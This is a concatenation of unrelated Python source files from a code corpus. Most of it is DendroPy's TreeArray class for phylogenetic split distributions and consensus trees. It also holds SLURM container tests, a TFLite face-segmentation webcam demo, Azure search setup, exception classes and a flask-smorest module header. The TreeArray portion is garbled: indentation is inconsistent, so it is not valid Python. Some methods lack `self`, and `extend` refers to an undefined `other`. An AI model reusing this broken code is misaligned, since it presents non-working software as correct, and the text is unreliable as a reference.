self._tree_leafset_bitmasks.extend(other._tree_leafset_bitmasks)
self._tree_weights.extend(other._tree_weights)
self._split_distribution.update(other._split_distribution)
##############################################################################
## Fundamental Tree Accession
    def add_tree(self,
            tree,
            is_bipartitions_updated=False,
            index=None):
        """
        Adds the structure represented by a |Tree| instance to the
        collection.
        Parameters
        ----------
        tree : |Tree|
            A |Tree| instance. This must have the same rooting state as
            all the other trees accessioned into this collection as well as
            that of ``self.is_rooted_trees``.
        is_bipartitions_updated : bool
            If |False| [default], then the tree will have its splits encoded or
            updated. Otherwise, if |True|, then the tree is assumed to have its
            splits already encoded and updated.
        index : integer
            Insert before index.
        Returns
        -------
        index : int
            The index of the accession.
        s : iterable of splits
            A list of split bitmasks from ``tree``.
        e :
            A list of edge length values from ``tree``.
        """
        if self.taxon_namespace is not tree.taxon_namespace:
            raise error.TaxonNamespaceIdentityError(self, tree)
        self.validate_rooting(tree.is_rooted)
        # Also updates self._split_distribution as a side effect of counting.
        # node_ages is unused here; ages are tracked by the distribution.
        splits, edge_lengths, node_ages = self._split_distribution.count_splits_on_tree(
                tree=tree,
                is_bipartitions_updated=is_bipartitions_updated,
                default_edge_length_value=self.default_edge_length_value)
        # pre-process splits
        splits = tuple(splits)
        # pre-process edge lengths
        if self.ignore_edge_lengths:
            # Store placeholders so the edge-length list stays index-aligned
            # with the split list even when lengths are not recorded.
            edge_lengths = tuple( None for x in range(len(splits)) )
        else:
            assert len(splits) == len(edge_lengths), "Unequal vectors:\n Splits: {}\n Edges: {}\n".format(splits, edge_lengths)
            edge_lengths = tuple(edge_lengths)
        # pre-process weights
        if tree.weight is not None and self.use_tree_weights:
            weight_to_use = float(tree.weight)
        else:
            # Unweighted trees (or weighting disabled) count with weight 1.
            weight_to_use = 1.0
        # accession info
        if index is None:
            # Append to the end of all four (parallel) per-tree lists.
            index = len(self._tree_split_bitmasks)
            self._tree_split_bitmasks.append(splits)
            self._tree_leafset_bitmasks.append(tree.seed_node.edge.bipartition.leafset_bitmask)
            self._tree_edge_lengths.append(edge_lengths)
            self._tree_weights.append(weight_to_use)
        else:
            # Insert at the same position in all four (parallel) lists so
            # they stay index-aligned.
            self._tree_split_bitmasks.insert(index, splits)
            self._tree_leafset_bitmasks.insert(index,
                    tree.seed_node.edge.bipartition.leafset_bitmask)
            self._tree_edge_lengths.insert(index, edge_lengths)
            self._tree_weights.insert(index, weight_to_use)
        return index, splits, edge_lengths, weight_to_use
    def add_trees(self, trees, is_bipartitions_updated=False):
        """
        Adds multiple structures represented by an iterator over or iterable of
        |Tree| instances to the collection.
        Parameters
        ----------
        trees : iterator over or iterable of |Tree| instances
            An iterator over or iterable of |Tree| instances. These must
            have the same rooting state as all the other trees accessioned into
            this collection as well as that of ``self.is_rooted_trees``.
        is_bipartitions_updated : bool
            If |False| [default], then the tree will have its splits encoded or
            updated. Otherwise, if |True|, then the tree is assumed to have its
            splits already encoded and updated.
        """
        for tree in trees:
            self.add_tree(tree,
                    is_bipartitions_updated=is_bipartitions_updated)
##############################################################################
## I/O
def read_from_files(self,
files,
schema,
**kwargs):
"""
Adds multiple structures from one or more external file sources to the
collection.
Parameters
----------
files : iterable of strings and/or file objects
A list or some other iterable of file paths or file-like objects
(string elements will be assumed to be paths to files, while all
other types of elements will be assumed to be file-like
objects opened for reading).
schema : string
The data format of the source. E.g., "nexus", "newick", "nexml".
\*\*kwargs : keyword arguments
These will be passed directly to the underlying schema-specific
reader implementation.
"""
if "taxon_namespace" in kwargs:
if kwargs["taxon_namespace"] is not self.taxon_namespace:
raise ValueError("TaxonNamespace object passed as keyword argument is not the same as self's TaxonNamespace reference")
kwargs.pop("taxon_namespace")
target_tree_offset = kwargs.pop("tree_offset", 0)
tree_yielder = self.tree_type.yield_from_files(
files=files,
schema=schema,
taxon_namespace=self.taxon_namespace,
**kwargs)
current_source_index = None
current_tree_offset = None
for tree_idx, tree in enumerate(tree_yielder):
current_yielder_index = tree_yielder.current_file_index
if current_source_index != current_yielder_index:
current_source_index = current_yielder_index
current_tree_offset = 0
if current_tree_offset >= target_tree_offset:
self.add_tree(tree=tree, is_bipartitions_updated=False)
current_tree_offset += 1
def _parse_and_add_from_stream(self,
stream,
schema,
**kwargs):
cur_size = len(self._tree_split_bitmasks)
self.read_from_files(files=[stream], schema=schema, **kwargs)
new_size = len(self._tree_split_bitmasks)
return new_size - cur_size
    def read(self, **kwargs):
        """
        Add |Tree| objects to existing |TreeList| from data source providing
        one or more collections of trees.
        **Mandatory Source-Specification Keyword Argument (Exactly One Required):**
            - **file** (*file*) -- File or file-like object of data opened for reading.
            - **path** (*str*) -- Path to file of data.
            - **url** (*str*) -- URL of data.
            - **data** (*str*) -- Data given directly.
        **Mandatory Schema-Specification Keyword Argument:**
            - **schema** (*str*) -- Identifier of format of data given by the
              "``file``", "``path``", "``data``", or "``url``" argument
              specified above: ":doc:`newick </schemas/newick>`", ":doc:`nexus
              </schemas/nexus>`", or ":doc:`nexml </schemas/nexml>`". See
              "|Schemas|" for more details.
        **Optional General Keyword Arguments:**
            - **collection_offset** (*int*) -- 0-based index of tree block or
              collection in source to be parsed. If not specified then the
              first collection (offset = 0) is assumed.
            - **tree_offset** (*int*) -- 0-based index of first tree within the
              collection specified by ``collection_offset`` to be parsed (i.e.,
              skipping the first ``tree_offset`` trees). If not
              specified, then the first tree (offset = 0) is assumed (i.e., no
              trees within the specified collection will be skipped). Use this
              to specify, e.g. a burn-in.
            - **ignore_unrecognized_keyword_arguments** (*bool*) -- If |True|,
              then unsupported or unrecognized keyword arguments will not
              result in an error. Default is |False|: unsupported keyword
              arguments will result in an error.
        **Optional Schema-Specific Keyword Arguments:**
            These provide control over how the data is interpreted and
            processed, and supported argument names and values depend on
            the schema as specified by the value passed as the "``schema``"
            argument. See "|Schemas|" for more details.
        **Examples:**
        ::
            tree_array = dendropy.TreeArray()
            tree_array.read(
                    file=open('treefile.tre', 'rU'),
                    schema="newick",
                    tree_offset=100)
            tree_array.read(
                    path='sometrees.nexus',
                    schema="nexus",
                    collection_offset=2,
                    tree_offset=100)
            tree_array.read(
                    data="((A,B),(C,D));((A,C),(B,D));",
                    schema="newick")
            tree_array.read(
                    url="http://api.opentreeoflife.org/v2/study/pg_1144/tree/tree2324.nex",
                    schema="nexus")
        """
        # Delegate source resolution and parsing to basemodel.MultiReadable.
        return basemodel.MultiReadable._read_from(self, **kwargs)
##############################################################################
## Container (List) Interface
def append(tree, is_bipartitions_updated=False):
"""
Adds a |Tree| instance to the collection before position given
by ``index``.
Parameters
----------
tree : |Tree|
A |Tree| instance. This must have the same rooting state as
all the other trees accessioned into this collection as well as
that of ``self.is_rooted_trees``.
is_bipartitions_updated : bool
If |False| [default], then the tree will have its splits encoded or
updated. Otherwise, if |True|, then the tree is assumed to have its
splits already encoded and updated.
"""
return self.add_tree(tree=tree,
is_bipartitions_updated=is_bipartitions_updated)
def insert(index, tree, is_bipartitions_updated=False):
"""
Adds a |Tree| instance to the collection before position given
by ``index``.
Parameters
----------
index : integer
Insert before index.
tree : |Tree|
A |Tree| instance. This must have the same rooting state as
all the other trees accessioned into this collection as well as
that of ``self.is_rooted_trees``.
is_bipartitions_updated : bool
If |False| [default], then the tree will have its splits encoded or
updated. Otherwise, if |True|, then the tree is assumed to have its
splits already encoded and updated.
Returns
-------
index : int
The index of the accession.
s : iterable of splits
A list of split bitmasks from ``tree``.
e :
A list of edge length values ``tree``.
"""
return self.add_tree(tree=tree,
is_bipartitions_updated=is_bipartitions_updated,
index=index)
def extend(self, tree_array):
"""
Accession of data from ``tree_array`` to self.
Parameters
----------
tree_array : |TreeArray|
A |TreeArray| instance from which to add data.
"""
assert self.taxon_namespace is tree_array.taxon_namespace
assert self._is_rooted_trees is tree_array._is_rooted_trees
assert self.ignore_edge_lengths is tree_array.ignore_edge_lengths
assert self.ignore_node_ages is tree_array.ignore_node_ages
assert self.use_tree_weights is tree_array.use_tree_weights
self._tree_split_bitmasks.extend(tree_array._tree_split_bitmasks)
self._tree_edge_lengths.extend(tree_array._tree_edge_lengths)
self._tree_weights.extend(other._tree_weights)
self._split_distribution.update(tree_array._split_distribution)
return self
def __iadd__(self, tree_array):
"""
Accession of data from ``tree_array`` to self.
Parameters
----------
tree_array : |TreeArray|
A |TreeArray| instance from which to add data.
"""
return self.extend(tree_array)
def __add__(self, other):
"""
Creates and returns new |TreeArray|.
Parameters
----------
other : iterable of |Tree| objects
Returns
-------
tlist : |TreeArray| object
|TreeArray| object containing clones of |Tree| objects
in ``self`` and ``other``.
"""
ta = TreeArray(
taxon_namespace=self.taxon_namespace,
is_rooted_trees=self._is_rooted_trees,
ignore_edge_lengths=self.ignore_edge_lengths,
ignore_node_ages=self.ignore_node_ages,
use_tree_weights=self.use_tree_weights,
ultrametricity_precision=self._split_distribution.ultrametricity_precision,
)
ta.default_edge_length_value = self.default_edge_length_value
ta.tree_type = self.tree_type
ta += self
ta += other
return ta
def __contains__(self, splits):
# expensive!!
return tuple(splits) in self._tree_split_bitmasks
    def __delitem__(self, index):
        """Not supported: removing one tree's contribution from the
        aggregated split distribution is expensive and not implemented
        (see the sketch below the ``raise``)."""
        raise NotImplementedError
        # expensive!!
        # tree_split_bitmasks = self._trees_splits[index]
        ### TODO: remove this "tree" from underlying splits distribution
        # for split in tree_split_bitmasks:
        #    self._split_distribution.split_counts[split] -= 1
        # etc.
        # becomes complicated because tree weights need to be updated etc.
        # del self._tree_split_bitmasks[index]
        # del self._tree_edge_lengths[index]
        # return
def __iter__(self):
"""
Yields pairs of (split, edge_length) from the store.
"""
for split, edge_length in zip(self._tree_split_bitmasks, self._tree_edge_lengths):
yield split, edge_length
    def __reversed__(self):
        """Not supported."""
        raise NotImplementedError
    def __len__(self):
        """Number of trees accessioned into the array."""
        return len(self._tree_split_bitmasks)
    def __getitem__(self, index):
        """Not supported; use :meth:`get_split_bitmask_and_edge_tuple`
        to retrieve the raw data for a given accession index."""
        raise NotImplementedError
        # """
        # Returns a pair of tuples, ( (splits...), (lengths...) ), corresponding
        # to the "tree" at ``index``.
        # """
        # return self._tree_split_bitmasks[index], self._tree_edge_lengths[index]
    def __setitem__(self, index, value):
        """Not supported."""
        raise NotImplementedError
    def clear(self):
        """Not supported.

        NOTE(review): the statements below the ``raise`` are unreachable;
        they sketch what a working implementation would reset.
        """
        raise NotImplementedError
        self._tree_split_bitmasks = []
        self._tree_edge_lengths = []
        self._tree_leafset_bitmasks = []
        self._split_distribution.clear()
    def index(self, splits):
        """Not supported. (The ``return`` after the ``raise`` is unreachable.)"""
        raise NotImplementedError
        return self._tree_split_bitmasks.index(splits)
    def pop(self, index=-1):
        """Not supported (see ``__delitem__`` for why removal is hard)."""
        raise NotImplementedError
    def remove(self, tree):
        """Not supported (see ``__delitem__`` for why removal is hard)."""
        raise NotImplementedError
    def reverse(self):
        """Not supported."""
        raise NotImplementedError
    def sort(self, key=None, reverse=False):
        """Not supported."""
        raise NotImplementedError
##############################################################################
## Accessors/Settors
def get_split_bitmask_and_edge_tuple(self, index):
"""
Returns a pair of tuples, ( (splits...), (lengths...) ), corresponding
to the "tree" at ``index``.
"""
return self._tree_split_bitmasks[index], self._tree_edge_lengths[index]
##############################################################################
## Calculations
def calculate_log_product_of_split_supports(self,
include_external_splits=False,
):
"""
Calculates the log product of split support for each of the trees in
the collection.
Parameters
----------
include_external_splits : bool
If |True|, then non-internal split posteriors will be included in
the score. Defaults to |False|: these are skipped. This should only
make a difference when dealing with splits collected from trees of
different leaf sets.
Returns
-------
s : tuple(list[numeric], integer)
Returns a tuple, with the first element being the list of scores
and the second being the index of the highest score. The element order
corresponds to the trees accessioned in the collection.
"""
assert len(self._tree_leafset_bitmasks) == len(self._tree_split_bitmasks)
scores = []
max_score = None
max_score_tree_idx = None
split_frequencies = self._split_distribution.split_frequencies
for tree_idx, (tree_leafset_bitmask, split_bitmasks) in enumerate(zip(self._tree_leafset_bitmasks, self._tree_split_bitmasks)):
log_product_of_split_support = 0.0
for split_bitmask in split_bitmasks:
if (include_external_splits
or split_bitmask == tree_leafset_bitmask # count root edge (following BEAST)
or not treemodel.Bipartition.is_trivial_bitmask(split_bitmask, tree_leafset_bitmask)
):
split_support = split_frequencies.get(split_bitmask, 0.0)
if split_support:
log_product_of_split_support += math.log(split_support)
if max_score is None or max_score < log_product_of_split_support:
max_score = log_product_of_split_support
max_score_tree_idx = tree_idx
scores.append(log_product_of_split_support)
return scores, max_score_tree_idx
def maximum_product_of_split_support_tree(self,
include_external_splits=False,
summarize_splits=True,
**split_summarization_kwargs
):
"""
Return the tree with that maximizes the product of split supports, also
known as the "Maximum Clade Credibility Tree" or MCCT.
Parameters
----------
include_external_splits : bool
If |True|, then non-internal split posteriors will be included in
the score. Defaults to |False|: these are skipped. This should only
make a difference when dealing with splits collected from trees of
different leaf sets.
Returns
-------
mcct_tree : Tree
Tree that maximizes the product of split supports.
"""
scores, max_score_tree_idx = self.calculate_log_product_of_split_supports(
include_external_splits=include_external_splits,
)
tree = self.restore_tree(
index=max_score_tree_idx,
**split_summarization_kwargs)
tree.log_product_of_split_support = scores[max_score_tree_idx]
if summarize_splits:
self._split_distribution.summarize_splits_on_tree(
tree=tree,
is_bipartitions_updated=True,
**split_summarization_kwargs
)
return tree
def calculate_sum_of_split_supports(self,
include_external_splits=False,
):
"""
Calculates the *sum* of split support for all trees in the
collection.
Parameters
----------
include_external_splits : bool
If |True|, then non-internal split posteriors will be included in
the score. Defaults to |False|: these are skipped. This should only
make a difference when dealing with splits collected from trees of
different leaf sets.
Returns
-------
s : tuple(list[numeric], integer)
Returns a tuple, with the first element being the list of scores
and the second being the index of the highest score. The element order
corresponds to the trees accessioned in the collection.
"""
assert len(self._tree_leafset_bitmasks) == len(self._tree_split_bitmasks)
scores = []
max_score = None
max_score_tree_idx = None
split_frequencies = self._split_distribution.split_frequencies
for tree_idx, (tree_leafset_bitmask, split_bitmasks) in enumerate(zip(self._tree_leafset_bitmasks, self._tree_split_bitmasks)):
sum_of_support = 0.0
for split_bitmask in split_bitmasks:
if (include_external_splits
or split_bitmask == tree_leafset_bitmask # count root edge (following BEAST)
or not treemodel.Bipartition.is_trivial_bitmask(split_bitmask, tree_leafset_bitmask)
):
split_support = split_frequencies.get(split_bitmask, 0.0)
sum_of_support += split_support
if max_score is None or max_score < sum_of_support:
max_score = sum_of_support
max_score_tree_idx = tree_idx
scores.append(sum_of_support)
return scores, max_score_tree_idx
def maximum_sum_of_split_support_tree(self,
include_external_splits=False,
summarize_splits=True,
**split_summarization_kwargs
):
"""
Return the tree with that maximizes the *sum* of split supports.
Parameters
----------
include_external_splits : bool
If |True|, then non-internal split posteriors will be included in
the score. Defaults to |False|: these are skipped. This should only
make a difference when dealing with splits collected from trees of
different leaf sets.
Returns
-------
mst_tree : Tree
Tree that maximizes the sum of split supports.
"""
scores, max_score_tree_idx = self.calculate_sum_of_split_supports(
include_external_splits=include_external_splits,
)
tree = self.restore_tree(
index=max_score_tree_idx,
**split_summarization_kwargs
)
tree.sum_of_split_support = scores[max_score_tree_idx]
if summarize_splits:
self._split_distribution.summarize_splits_on_tree(
tree=tree,
is_bipartitions_updated=True,
**split_summarization_kwargs
)
return tree
    def collapse_edges_with_less_than_minimum_support(self,
            tree,
            min_freq=constants.GREATER_THAN_HALF,
            ):
        """Collapse edges of ``tree`` whose split frequency is below
        ``min_freq``; delegates to the underlying split distribution."""
        # NOTE(review): this accesses ``self.split_distribution`` while every
        # other method in this class uses ``self._split_distribution``.
        # Confirm that a public ``split_distribution`` property exists
        # elsewhere in the class; otherwise this raises AttributeError.
        return self.split_distribution.collapse_edges_with_less_than_minimum_support(
            tree=tree,
            min_freq=min_freq)
def consensus_tree(self,
min_freq=constants.GREATER_THAN_HALF,
summarize_splits=True,
**split_summarization_kwargs
):
"""
Returns a consensus tree from splits in ``self``.
Parameters
----------
min_freq : real
The minimum frequency of a split in this distribution for it to be
added to the tree.
is_rooted : bool
Should tree be rooted or not? If *all* trees counted for splits are
explicitly rooted or unrooted, then this will default to |True| or
|False|, respectively. Otherwise it defaults to |None|.
\*\*split_summarization_kwargs : keyword arguments
These will be passed directly to the underlying
`SplitDistributionSummarizer` object. See
:meth:`SplitDistributionSummarizer.configure` for options.
Returns
-------
t : consensus tree
"""
tree = self._split_distribution.consensus_tree(
min_freq=min_freq,
is_rooted=self.is_rooted_trees,
summarize_splits=summarize_splits,
**split_summarization_kwargs
)
# return self._split_distribution.consensus_tree(*args, **kwargs)
return tree
##############################################################################
## Mapping of Split Support
def summarize_splits_on_tree(self,
tree,
is_bipartitions_updated=False,
**kwargs):
if self.taxon_namespace is not tree.taxon_namespace:
raise error.TaxonNamespaceIdentityError(self, tree)
self._split_distribution.summarize_splits_on_tree(
tree=tree,
is_bipartitions_updated=is_bipartitions_updated,
**kwargs
)
##############################################################################
## Tree Reconstructions
def restore_tree(self,
index,
summarize_splits_on_tree=False,
**split_summarization_kwargs
):
split_bitmasks = self._tree_split_bitmasks[index]
if self.ignore_edge_lengths:
split_edge_lengths = None
else:
assert len(self._tree_split_bitmasks) == len(self._tree_edge_lengths)
edge_lengths = self._tree_edge_lengths[index]
split_edge_lengths = dict(zip(split_bitmasks, edge_lengths))
tree = self.tree_type.from_split_bitmasks(
split_bitmasks=split_bitmasks,
taxon_namespace=self.taxon_namespace,
is_rooted=self._is_rooted_trees,
split_edge_lengths=split_edge_lengths,
)
# if update_bipartitions:
# tree.encode_bipartitions()
if summarize_splits_on_tree:
split_summarization_kwargs["is_bipartitions_updated"] = True
self._split_distribution.summarize_splits_on_tree(
tree=tree,
**split_summarization_kwargs)
return tree
##############################################################################
## Topology Frequencies
def split_bitmask_set_frequencies(self):
"""
Returns a dictionary with keys being sets of split bitmasks and values
being the frequency of occurrence of trees represented by those split
bitmask sets in the collection.
"""
split_bitmask_set_count_map = collections.Counter()
assert len(self._tree_split_bitmasks) == len(self._tree_weights)
for split_bitmask_set, weight in zip(self._tree_split_bitmasks, self._tree_weights):
split_bitmask_set_count_map[frozenset(split_bitmask_set)] += (1.0 * weight)
split_bitmask_set_freqs = {}
normalization_weight = self._split_distribution.calc_normalization_weight()
# print("===> {}".format(normalization_weight))
for split_bitmask_set in split_bitmask_set_count_map:
split_bitmask_set_freqs[split_bitmask_set] = split_bitmask_set_count_map[split_bitmask_set] / normalization_weight
return split_bitmask_set_freqs
def bipartition_encoding_frequencies(self):
"""
Returns a dictionary with keys being bipartition encodings of trees
(as ``frozenset`` collections of |Bipartition| objects) and
values the frequency of occurrence of trees represented by that
encoding in the collection.
"""
# split_bitmask_set_freqs = self.split_bitmask_set_frequencies()
# bipartition_encoding_freqs = {}
# for split_bitmask_set, freq in split_bitmask_set_freqs.items():
# bipartition_encoding = []
# inferred_leafset = max(split_bitmask_set)
# for split_bitmask in split_bitmask_set:
# bipartition = treemodel.Bipartition(
# bitmask=split_bitmask,
# tree_leafset_bitmask=inferred_leafset,
# is_rooted=self._is_rooted_trees,
# is_mutable=False,
# compile_bipartition=True,
# )
# bipartition_encoding.append(bipartition)
# bipartition_encoding_freqs[frozenset(bipartition_encoding)] = freq
# return bipartition_encoding_freqs
bipartition_encoding_freqs = {}
topologies = self.topologies()
for tree in topologies:
bipartition_encoding_freqs[ frozenset(tree.encode_bipartitions()) ] = tree.frequency
return bipartition_encoding_freqs
    def topologies(self,
            sort_descending=None,
            frequency_attr_name="frequency",
            frequency_annotation_name="frequency",
            ):
        """
        Returns a |TreeList| instance containing the reconstructed tree
        topologies (i.e. |Tree| instances with no edge weights) in the
        collection, with the frequency added as an attributed.

        Parameters
        ----------
        sort_descending : bool
            If |True|, then topologies will be sorted in *descending* frequency
            order (i.e., topologies with the highest frequencies will be listed
            first). If |False|, then they will be sorted in *ascending*
            frequency. If |None| (default), then they will not be sorted.
        frequency_attr_name : str
            Name of attribute to add to each |Tree| representing
            the frequency of that topology in the collection. If |None|
            then the attribute will not be added.
        frequency_annotation_name : str
            Name of annotation to add to the annotations of each |Tree|,
            representing the frequency of that topology in the collection. The
            value of this annotation will be dynamically-bound to the attribute
            specified by ``frequency_attr_name`` unless that is |None|. If
            ``frequency_annotation_name`` is |None| then the annotation will not
            be added.
        """
        # Sorting requires the frequency attribute to exist on each tree.
        if sort_descending is not None and frequency_attr_name is None:
            raise ValueError("Attribute needs to be set on topologies to enable sorting")
        split_bitmask_set_freqs = self.split_bitmask_set_frequencies()
        topologies = TreeList(taxon_namespace=self.taxon_namespace)
        for split_bitmask_set, freq in split_bitmask_set_freqs.items():
            tree = self.tree_type.from_split_bitmasks(
                split_bitmasks=split_bitmask_set,
                taxon_namespace=self.taxon_namespace,
                is_rooted=self._is_rooted_trees,
            )
            if frequency_attr_name is not None:
                setattr(tree, frequency_attr_name, freq)
                if frequency_annotation_name is not None:
                    # Annotation value tracks the attribute dynamically.
                    tree.annotations.add_bound_attribute(
                        attr_name=frequency_attr_name,
                        annotation_name=frequency_annotation_name,
                    )
            # NOTE(review): indentation was ambiguous in the source; this
            # ``else`` is taken to pair with the OUTER ``if`` (no attribute
            # requested -> add an unbound annotation holding the value).
            # If ``frequency_annotation_name`` is also None here, an
            # annotation named ``None`` would be added — confirm upstream.
            else:
                tree.annotations.add_new(
                    frequency_annotation_name,
                    freq,
                )
            topologies.append(tree)
        if sort_descending is not None:
            topologies.sort(key=lambda t: getattr(t, frequency_attr_name), reverse=sort_descending)
        return topologies
| StarcoderdataPython |
1942960 | <reponame>drewsilcock/docker-centos7-slurm<filename>tests/test_slurm.py<gh_stars>1-10
import time
import pytest
@pytest.mark.parametrize("partition", ["normal", "debug"])
def test_partitions_are_up(host, partition):
    """Every configured SLURM partition must report State=UP."""
    command = f"scontrol -o show partition {partition}"
    status_line = host.check_output(command)
    assert "State=UP" in status_line
def test_job_can_run(host):
    """A trivial batch job runs and writes its output on the controller node."""
    host.run('sbatch --wrap="hostname"')
    # Give the scheduler a moment to run the job and flush the output file.
    time.sleep(2)
    job_output = host.file("slurm-1.out")
    assert job_output.content_string == "slurmctl\n"
| StarcoderdataPython |
8026353 | import sys
import argparse
import numpy as np
import cv2
import time
from PIL import Image
try:
from tflite_runtime.interpreter import Interpreter
except:
from tensorflow.lite.python.interpreter import Interpreter
# FPS overlay text and frame counters, updated inside the main capture loop.
fps = ""
framecount = 0
time1 = 0

# One color tuple per CelebAMask-HQ face-parsing class id (index == class id).
# Applied to the visualization buffer in decode_prediction_mask; channel
# order there is treated as RGB — see the channel handling in __main__.
LABEL_CONTOURS = [(0, 0, 0), # 0=background
                  # 1=skin, 2=l_brow, 3=r_brow, 4=l_eye, 5=r_eye
                  (128, 0, 0), (0, 128, 0), (128, 128, 0), (0, 0, 128), (128, 0, 128),
                  # 6=eye_g, 7=l_ear, 8=r_ear, 9=ear_r, 10=nose
                  (0, 128, 128), (128, 128, 128), (64, 0, 0), (192, 0, 0), (64, 128, 0),
                  # 11=mouth, 12=u_lip, 13=l_lip, 14=neck, 15=neck_l
                  (192, 128, 0), (64, 0, 128), (192, 0, 128), (64, 128, 128), (192, 128, 128),
                  # 16=cloth, 17=hair, 18=hat
                  (0, 64, 0), (128, 64, 0), (0, 192, 0)]
def decode_prediction_mask(mask):
    """Map per-pixel class ids in a 2-D *mask* to a color visualization image.

    Background (0) and the ignore label (255) are left black; every other
    class id present in the mask is painted with its LABEL_CONTOURS entry.
    """
    height, width = mask.shape[0], mask.shape[1]
    mask_color = np.zeros((height, width, 3), dtype=np.uint8)
    for label_id in np.unique(mask):
        if label_id == 0 or label_id == 255:
            continue
        mask_color[mask == label_id] = LABEL_CONTOURS[label_id]
    return mask_color
if __name__ == '__main__':
    # Command-line configuration for the model path, camera, and threading.
    parser = argparse.ArgumentParser()
    parser.add_argument("--deep_model", default="bisenetv2_celebamaskhq_448x448_integer_quant.tflite",
                        help="Path of the BiSeNetV2 model. Integer Quant models are optimized for ARM. Try Weight Quant if you are using x86.")
    parser.add_argument("--usbcamno", type=int, default=0, help="USB Camera number.")
    parser.add_argument('--camera_width', type=int, default=640, help='USB Camera resolution (width). (Default=640)')
    parser.add_argument('--camera_height', type=int, default=480, help='USB Camera resolution (height). (Default=480)')
    parser.add_argument('--vidfps', type=int, default=30, help='FPS of Video. (Default=30)')
    parser.add_argument("--num_threads", type=int, default=4, help="Threads.")
    args = parser.parse_args()
    deep_model = args.deep_model
    usbcamno = args.usbcamno
    vidfps = args.vidfps
    camera_width = args.camera_width
    camera_height = args.camera_height
    num_threads = args.num_threads

    # Load the TFLite model once and cache input/output tensor indices and
    # the model's expected input resolution.
    interpreter = Interpreter(model_path=deep_model, num_threads=num_threads)
    interpreter.allocate_tensors()
    input_details = interpreter.get_input_details()[0]['index']
    bisenetv2_predictions = interpreter.get_output_details()[0]['index']
    model_height = interpreter.get_input_details()[0]['shape'][1]
    model_width = interpreter.get_input_details()[0]['shape'][2]
    # print('interpreter.get_output_details()[0]:', interpreter.get_output_details()[0])

    # Configure the USB camera capture.
    cam = cv2.VideoCapture(usbcamno)
    cam.set(cv2.CAP_PROP_FPS, vidfps)
    cam.set(cv2.CAP_PROP_FRAME_WIDTH, camera_width)
    cam.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_height)
    waittime = 1
    window_name = "USB Camera"
    cv2.namedWindow(window_name, cv2.WINDOW_AUTOSIZE)

    # Capture -> preprocess -> infer -> visualize loop; press 'q' to quit.
    while True:
        t1 = time.perf_counter()

        ret, color_image = cam.read()
        if not ret:
            continue

        # Normalization: resize to the model input size, convert BGR->RGB,
        # add the batch dimension, and scale pixels to [-1, 1]
        # (x/255, then (x-0.5)/0.5).
        prepimg_deep = cv2.resize(color_image, (model_width, model_height))
        prepimg_deep = cv2.cvtColor(prepimg_deep, cv2.COLOR_BGR2RGB)
        prepimg_deep = np.expand_dims(prepimg_deep, axis=0)
        prepimg_deep = prepimg_deep.astype(np.float32)
        prepimg_deep /= 255.0
        prepimg_deep -= [[[0.5, 0.5, 0.5]]]
        prepimg_deep /= [[[0.5, 0.5, 0.5]]]

        # Run model
        interpreter.set_tensor(input_details, prepimg_deep)
        interpreter.invoke()

        # Get results
        # NOTE(review): decode_prediction_mask indexes the output as a 2-D
        # class-id map; confirm the model emits (H, W) rather than (1, H, W).
        predictions = interpreter.get_tensor(bisenetv2_predictions)

        # Segmentation: colorize the class map and scale back to camera size.
        # NOTE(review): the [:, :, (2, 1, 0)] reversal followed by
        # cv2.cvtColor(..., COLOR_RGB2BGR) swaps channels twice, which is a
        # net no-op on channel order — confirm this is intended.
        imdraw = decode_prediction_mask(predictions)[:, :, (2, 1, 0)]
        imdraw = cv2.cvtColor(imdraw, cv2.COLOR_RGB2BGR)
        imdraw = cv2.resize(imdraw, (camera_width, camera_height))
        cv2.putText(imdraw, fps, (camera_width-170,15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)

        cv2.imshow(window_name, imdraw)
        if cv2.waitKey(waittime)&0xFF == ord('q'):
            break

        # FPS calculation: report the average of the last 10 frames.
        framecount += 1
        if framecount >= 10:
            fps = "(Playback) {:.1f} FPS".format(time1/10)
            framecount = 0
            time1 = 0
        t2 = time.perf_counter()
        elapsedTime = t2-t1
        time1 += 1/elapsedTime
| StarcoderdataPython |
11349557 | import asyncio
from aiohttp import ClientSession
import settings
from interfaces import *
async def setup_search_interface(app):
    """Attach an Azure search interface to *app* as ``app.search``.

    Intended to run as an application startup coroutine; the email index
    client is bound to the app's event loop.
    """
    # Yield control once so this behaves well as a startup task.
    await asyncio.sleep(0)
    app.search = AzureSearchInterface(
        emails=AzureSearchIndexInterface(
            settings.db.AZURE_SEARCH_EMAILS_INDEX_URL,
            settings.db.AZURE_SEARCH_API_KEY,
            ClientSession(loop=app.loop),
        )
    )
5148140 | from typing import Iterable
class SearchRetryException(Exception):
    """Raised to indicate a retryable search failure."""
    pass
class DataStoreException(Exception):
    """Raised on datastore-layer failures."""
    pass
class SearchException(Exception):
    """Raised on general search failures."""
    pass
class SearchDepthException(Exception):
    """Raised when a search exceeds its allowed depth."""
    pass
class UndefinedFunction(Exception):
    """Raised when an undefined function is referenced."""
    pass
class ILMException(Exception):
    """Raised on ILM (index lifecycle management) errors."""
    pass
class MultiKeyError(KeyError):
    """Lookup error carrying every missing key plus any partial result.

    Attributes
    ----------
    keys : set of str
        The keys that could not be found.
    partial_output
        Whatever output was assembled before the failure.
    """

    def __init__(self, keys: Iterable[str], partial_output):
        # The stringified key collection becomes the KeyError message.
        super().__init__(str(keys))
        self.keys = set(keys)
        self.partial_output = partial_output
11323030 | """API Blueprint
This is a subclass of Flask's Blueprint
It provides added features:
- Decorators to specify Marshmallow schema for view functions I/O
- API documentation registration
Documentation process works in several steps:
- At import time
- When a MethodView or a view function is decorated, relevant information
is automatically added to the object's ``_apidoc`` attribute.
- The ``Blueprint.doc`` decorator stores additional information in a separate
``_api_manual_doc``. It allows the user to specify documentation
information that flask-smorest can not - or does not yet - infer from the
code.
- The ``Blueprint.route`` decorator registers the endpoint in the Blueprint
and gathers all information about the endpoint in
``Blueprint._auto_docs[endpoint]`` and
``Blueprint._manual_docs[endpoint]``.
- At initialization time
- Schema instances are replaced either by their reference in the `schemas`
section of the spec if applicable, otherwise by their json representation.
- Automatic documentation is adapted to OpenAPI version and deep-merged with
manual documentation.
- Endpoints documentation is registered in the APISpec object.
"""
from collections import OrderedDict
from functools import wraps
from copy import deepcopy
from flask import Blueprint as FlaskBlueprint
from flask.views import MethodViewType
from .utils import deepupdate, load_info_from_docstring
from .arguments import ArgumentsMixin
from .response import ResponseMixin
from .pagination import PaginationMixin
from .etag import EtagMixin
from .spec import (
DEFAULT_REQUEST_BODY_CONTENT_TYPE, DEFAULT_RESPONSE_CONTENT_TYPE)
